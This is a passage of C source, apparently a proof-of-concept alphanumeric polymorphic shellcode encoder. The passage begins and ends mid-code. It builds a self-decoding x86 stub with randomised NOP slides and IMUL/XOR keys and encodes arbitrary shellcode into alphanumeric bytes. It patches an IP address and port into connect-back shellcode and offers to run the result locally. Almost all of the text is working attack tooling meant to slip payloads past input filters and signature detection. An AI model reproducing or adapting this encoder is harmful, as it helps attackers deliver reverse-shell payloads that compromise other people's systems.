size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | /*67*/ '\x49',// //dec ecx| |// | | | | | | /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | /*70*/ '\x41',// //inc edx| |// | | | | | | /*71*/ '\x49',// //dec edx| |// | | | | | | /*72*/ '\x41',// //inc esi| |// | | | | | | /*73*/ '\x49',// //dec esi+-----------------------+// | | | | | | /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | // | | | | | | // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | // or the offset will not be alphanumeric. | | | | | | // | | | | | | // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | // register instead. We happen to have such a register - edi =] | | | | | | // | | | | | | // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | // the pop eax would overwrite it | | | | | | // | | | | | | // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | // alphanumeric.). | | | | | | // | | | | | | // -OBSOLETE- | | | | | | // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (add the number of bytes to it) | | | | | | // If you wish to move it down, you will need to move it down by an even number of | | | | | | // bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (deduct the number of bytes from it) | | | | | | // | | | | | | // TODO: make a routine that moves it around randomally between allowed values | | | | | | // and sets the proper offsets | | | | | | // this routine should be called after the NOP slides have been randomized. | | | | | | // | | | | | | ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | /*83*/ '\x49',// //dec esi| |// | | | | | | /*84*/ '\x41',// //push eax| |// | | | | | | /*85*/ '\x49',// //pop eax| |// | | | | | | /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | // IMUL can go down to here | | | | | | ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. | | | | /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | /*104*/ '\x45', //ebp incremented once //inc ebp | | | | /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | };////////////////////////////////////////////////// | | UINT shrink; // | | UCHAR *found_msg; // | | UCHAR *p_decoder = decoder; // | | UCHAR xor1, xor2, key; // | | UCHAR temp_buf[3] = ""; // | | UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). | | UCHAR *p_shellcode = shellcode; // | | void *_eip = 0; // | | // | | int offset_nop_slide1; // | | int offset_nop_slide2; // | | int offset_half_size_decoder; // | | int offset_terminating_key; // | | int offset_imul_instruction1; // | | int offset_imul_instruction2; // | | int offset_imul_instruction3; // | | int offset_imul_instruction4; // | | int negative_offset_size_decoder1; // | | int negative_offset_size_decoder2; // | | int negative_offset_size_decoder3; // | | int offset_size_decoder_min_1; // | | int offset_size_decoder_pls_2; // | | int offset_imul_key_offset1; // | | int offset_imul_key_offset2; // | | int offset_imul_key_offset3; // | | int offset_imul_instruction; // | | int size_nop_slide1; // | | int size_nop_slide2; // | | int offset_jne_xor1; // | | int offset_jne_xor2; // | | int decoder_length_section1; // | | int decoder_length_section2; // | | int decoder_length_section3; // | | int imul_instruction_length; // | | int jne_xor_negative_offset; // | | int backward_slide_offset; // | | BOOL decoder_version_1; // | | UINT srand_value; // | | #ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | #endif ////////////////// | | printf("shellcode length:%d\n", size); // | | srand_value = time(NULL); // | | // srand_value = ; // for debugging | | srand(srand_value); // | | printf("srand value=%d\n", srand_value); // | | decoder_version_1 = rand() % 2; // | | ///// | | size_decoder = strlen(decoder);// | | decoder_length_section1 = 30; ////////////// | | decoder_length_section2 = 29; // | | decoder_length_section3 = 18; // | | // | | size_nop_slide1 = 28; // | | size_nop_slide2 = 0; // | | // | | imul_instruction_length = 4; // | | // | | shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | size_decoder -=shrink; /////////////////////////////////////////////////////// | | half_size_decoder = size_decoder/2; // | | size_nop_slide1 -=shrink; ///////////////////////// | | printf("shrinking decoder by: %d\n", shrink); // | | // | | offset_imul_instruction = decoder_length_section1+// | | decoder_length_section2+// | | size_nop_slide1;////////// | | // | | backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | strncpy(decoder, // | | slide_substr_back(decoder, // | | offset_imul_instruction, // | | imul_instruction_length, // | | size_decoder, ///// | | backward_slide_offset), // | | size_decoder); // | | offset_imul_instruction -=backward_slide_offset; // | | size_nop_slide1 -=backward_slide_offset; // | | size_nop_slide2 +=backward_slide_offset; ////////////// | | printf("backward_slide_offset = %d\n", backward_slide_offset);// | | /////////////////////////////////// | | negative_offset_size_decoder1 = 9; // | | negative_offset_size_decoder2 = 12; // | | negative_offset_size_decoder3 = 15; // | | // | | offset_half_size_decoder = 6; // | | offset_terminating_key = 8; // | | offset_jne_xor1 = 21; // | | offset_size_decoder_min_1 = 24; // | | // | | offset_imul_key_offset1 = 14 + decoder_length_section1; // | | offset_imul_key_offset2 = 17 + decoder_length_section1; // | | offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | offset_imul_key_offset3 = 24 + decoder_length_section1; // | | // | | offset_nop_slide1 = decoder_length_section1+ // | | decoder_length_section2; // | | offset_nop_slide2 = decoder_length_section1+ // | | decoder_length_section2+ // | | size_nop_slide1+ // | | imul_instruction_length; // | | // | | offset_imul_instruction1 = offset_imul_instruction; // | | offset_imul_instruction2 = offset_imul_instruction+1; // | | offset_imul_instruction3 = offset_imul_instruction+2; // | | offset_imul_instruction4 = offset_imul_instruction+3; // | | // | | // | | offset_imul_key = offset_imul_instruction4; // | | // | | offset_jne_xor2 = size_decoder-1; // | | jne_xor_negative_offset = decoder_length_section3+ // | | decoder_length_section2+ // | | size_nop_slide2+ // | | imul_instruction_length+ // | | size_nop_slide1; // | | // | | // | | printf("size_decoder=0x%2X - %s\n", // | | (UCHAR)size_decoder, ////// | | is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | // | | printf("half_size_decoder=0x%2X - %s\n", // | | (UCHAR)half_size_decoder, // | | is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_half_size_decoder) = half_size_decoder; // | | // | | printf("offset_imul_key=0x%2X - %s\n", // | | (UCHAR)offset_imul_key, // | | is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | // // | | printf("size_decoder-1=0x%2X - %s\n", // | | (UCHAR)size_decoder-1, // | | is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | // | | printf("size_decoder+2=0x%2X - %s\n", // | | (UCHAR)size_decoder+2, //////// | | is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | // | | *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | // | | *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 0); // | | *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 1); // | | #ifdef CONNECT_BACK_SHELLCODE // | | ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | if (ip_address == -1) /////////////////////////////////////////////////// | | exit(-1); // | | /////////////////////////////////// | | //set shellcode with ip address and port for connect-back // | | ///* ////////// | | *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | #endif ////////////////////////////////////////// | | //*/ // | | //set decoder with 'random' nop slides // | | strncpy(decoder+offset_nop_slide1, //////////////////////////// | | shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | size_nop_slide1); // | | strncpy(decoder+offset_nop_slide2, // | | shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | size_nop_slide2); /////////////////////////////// | | // | | //set decoder with random initial key //////////////////////////////////////////// | | *(decoder+offset_imul_key) = get_random_alnum_value();// | | printf("initial key=0x%2X - %s\n", ////////////// | | (UCHAR)*(decoder+offset_imul_key), // | | is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | // | | ////////////// | | // | | //set decoder with 'random' dword pushes for registers we won't use //////////////// | | *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | printf("push dword1=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | printf("push dword2=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | printf("push dword3=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | printf("push dword4=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | // | | //bugfix: this time after srand() :) // | | xor_al1=get_random_alnum_value(); // | | xor_al2=get_random_alnum_value(); // | | *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | // | | memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' SIZE_RANDOMIZED_DECODER_HEAD); ////// | //set first xor1 to random alnum value (this is the first byte of the encoded data) // | xor1 = get_random_alnum_value(); // | printf("xor1=0x%2X - %s\n", // | (UCHAR)xor1, // | is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | ///////////////////////////////////////////////////////// | RE_RUN: // | sprintf(alnum_shellcode, "%s",decoder); // | memset(temp_buf, 0, 3);/////////////////// | for(i=0; i<size; i++) // | { ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | // each original byte is encoded into 3 alphanumeric bytes where first_byte*third_byte^second_byte==original_byte // | // third_byte is the next encoded original byte's first_byte // | // the first byte of the terminating key is the last byte's third_byte /////// | p_xor2_key=get_xor2_and_key_for_xor1_and_c(xor1, shellcode[i]);//get a list of second_byte and third_byte for first_byte// | if(!p_xor2_key) /////// | goto RE_RUN; // | p_xor2_key = choose_random_node(p_xor2_key);//choose a random combination//////////////////////////////////////////// | key=p_xor2_key->key; // | xor2=p_xor2_key->xor2; // | temp_buf[0] = xor1; // | temp_buf[1] = xor2; // | strcat(alnum_shellcode, temp_buf); // append it to our decoder // | xor1=key; // | free_p_xor2_key(p_xor2_key); // free the list // | } //get next original_byte // | //////////////////////// | if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | { // | printf("error - terminating key found in encoded shellcode. running again to fix\n");// | goto RE_RUN; // | } ///////////////////////////////////////////////////// | *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | 4); // | // | //bugfix: handle case of esp pointing to shellcode // | if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | { // | // _asm{ // | // push esp; // | // pop eax; // | // xor al, 0x36; // | // xor al, 0x30; // | // } // | p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | p_alnum_shellcode[0] = 'T'; // | p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | p_alnum_shellcode[2] = '4'; // and using other xor values // | p_alnum_shellcode[3] = '6'; // <-- (x+6) // | p_alnum_shellcode[4] = '4'; // // | p_alnum_shellcode[5] = '0'; // <-- x // | p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | size_decoder += 6; // | } // | // | printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | printf("decoder length: %d\n%s\n", // | size_decoder, // | p_alnum_shellcode); // | // | printf("scanning alnum_shellcode for shellcode up to size bytes\n"); // | found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | // | if (str_is_alnum(alnum_shellcode)) // | { // | printf("execute shellcode locally? (hit: y and press enter): ");// | if(tolower(getchar()) == 'y') // | { ///////////// | _asm // | { // | push p_alnum_shellcode; //////// | pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' //jump to head of decoder // jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// } ////////////// } // } // else // { /////////////// printf("error non-alphanumeric shellcode\n"); // } ////////////////////////////// ///////// // return 0; ////// } // /////////////////// BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*alnum_str[offset+offset2])^alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*alnum_str[offset+offset2+1])^alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_xor_arg2_imul_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]^alnum_str[offset+offset2])*alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]^alnum_str[offset+offset2+1])*alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_imul_key_xor_arg2(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UCHAR key, UINT offset1, UINT offset2) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*key)^alnum_str[offset+offset2])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*key)^alnum_str[offset+offset2+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length) { UCHAR *alnum = malloc(strlen(ALNUM_CHARSET)+1); UCHAR *temp_buf = malloc(255); strncpy(alnum, ALNUM_CHARSET, strlen(ALNUM_CHARSET)); alnum[strlen(ALNUM_CHARSET)]=0; memset(temp_buf, 0, 255); //this is not for production, just a poc... while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 0, 1)) { alnum--; strcat(temp_buf, "(buf[0]*'"); temp_buf[strlen(temp_buf)] = *alnum; strcat(temp_buf, "')^buf[1]"); return(temp_buf); } } alnum-=strlen(ALNUM_CHARSET); while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 1, 0)) { alnum--; printf("key = 0x%2X ('%c')\n", *alnum, *alnum); return("found pattern using: (buf[1]*key)^buf[0]\n"); } } if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 0, 1)) return("(buf[0]*0x30)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 1, 0)) return("(buf[1]*0x30)^buf[0]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 0, 1)) return("(buf[0]*0x10)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 1, 0)) return("(buf[1]*0x10)^buf[0]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]*buf[1])^buf[2]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]*buf[2])^buf[1]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]*buf[2])^buf[0]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]^buf[1])*buf[2]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]^buf[2])*buf[1]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]^buf[2])*buf[0]"); else return ""; } BOOL is_alnum(UCHAR c) { char *alnum = ALNUM_CHARSET; char search_c[2] = ""; search_c[0] = c; return((BOOL)strstr(alnum, search_c)); } BOOL str_is_alnum(UCHAR *str) { ULONG length; length = strlen(str); for(;length>0;length--) { if( !is_alnum(str[length-1]) ) return 0; } return 1; } UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) { int xor_complement_1, xor_complement_2; UCHAR two_xor_complements[3]; for(xor_complement_1=0; xor_complement_1<MAX_BYTES; xor_complement_1++) { if (is_alnum((UCHAR)xor_complement_1)) { for(xor_complement_2=0; xor_complement_2<MAX_BYTES; xor_complement_2++) { if (is_alnum((UCHAR)xor_complement_2)) { if(byte == (xor ^ xor_complement_1 ^ xor_complement_2)) { two_xor_complements[0] = (UCHAR)xor_complement_1; two_xor_complements[1] = (UCHAR)xor_complement_2; } } } } } if(index == 0 || index == 1) return two_xor_complements[index]; else return (UCHAR)0; } BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key) { return (BOOL) strstr(alnum_shellcode, terminating_key); } DWORD ip_str_to_dw(UCHAR *str) { DWORD x[4]; int dwIpAddress; if (!str || MAX_IP_STR_LEN < strlen(str) || strlen(str) < MIN_IP_STR_LEN) return -1; sscanf(str, "%d.%d.%d.%d", &x[0],&x[1],&x[2],&x[3]); x[3] = x[3] > 255 ? -1 : (x[3] <<= 24); x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); x[0] = x[0] > 255 ? -1 : (x[0] <<= 0); dwIpAddress = x[0]+x[1]+x[2]+x[3]; return dwIpAddress; } DWORD my_htonl(DWORD dw_in) { DWORD dw_out; *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0); *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1); *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2); *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3); return dw_out; } void free_p_xor2_key(struct xor2_key *node) { struct xor2_key *temp = 0; if(node) { temp = node->prev; while(node->next) { node=node->next; free(node->prev); } free(node); } if(temp) { while(temp->prev) { temp=temp->prev; free(temp->next); } free(temp); } } struct xor2_key *choose_random_node(struct xor2_key *head) { int num_nodes = 1, selected_node, i; struct xor2_key* tail = head; struct xor2_key* pn = NULL ; if (!head || !head->key) return 0; while(tail->next) { tail = tail->next; num_nodes++; } selected_node = rand()%num_nodes; for(i=0; i<selected_node; i++) head = head->next; return head; } struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c) { struct xor2_key *p_xor2_key, *p_xor2_key_head; char *alnum = ALNUM_CHARSET; UINT i=0, z=1, r=0, count=0; UCHAR xor2=0, x=0; p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key)); p_xor2_key->prev = 0; p_xor2_key->next = 0; p_xor2_key->key = 0; p_xor2_key->xor2 = 0; for(i=0; alnum[i]; i++) { for(x=0; alnum[x];x++) { xor2 = alnum[x]; if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c) { p_xor2_key->xor2 = xor2; p_xor2_key->key = alnum[i]; p_xor2_key->next = malloc(sizeof(struct xor2_key)); p_xor2_key->next->prev = p_xor2_key; p_xor2_key = p_xor2_key->next; p_xor2_key->key=0; p_xor2_key->xor2=0; } } } if(!p_xor2_key->key) p_xor2_key->next = 0; if (p_xor2_key->prev) p_xor2_key = p_xor2_key->prev; else return 0; free(p_xor2_key->next); p_xor2_key->next=0; return p_xor2_key_head; } UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null. { UINT last, randomNum; UCHAR temporary; UCHAR *output = malloc(length); memcpy(output, str, length); for (last = length; last > 1; last--) { randomNum = rand( ) % last; temporary = output[randomNum]; output[randomNum] = output[last-1]; output[last-1] = temporary; } memcpy(str, output, length); return output; }// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > substr_offset) { printf("you can't slide it that far back!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len-slide); strncpy(output_str+prefix_substr_len-slide, substr, substr_len); strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide); strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > str_len-substr_len-substr_offset) { printf("you can't slide it that far forward!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len); strncpy(output_str+prefix_substr_len, suffix_substr, slide); strncpy(output_str+prefix_substr_len+slide, substr, substr_len); strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *get_nop_slide(UINT size, UINT slide) { //simple alnum nop slide generator UINT i, x, append_dec_eax = 0; UCHAR alnum_nop[][3] = { "AI", //inc ecx;dec ecx // (alnum_nop[0]) "BJ", 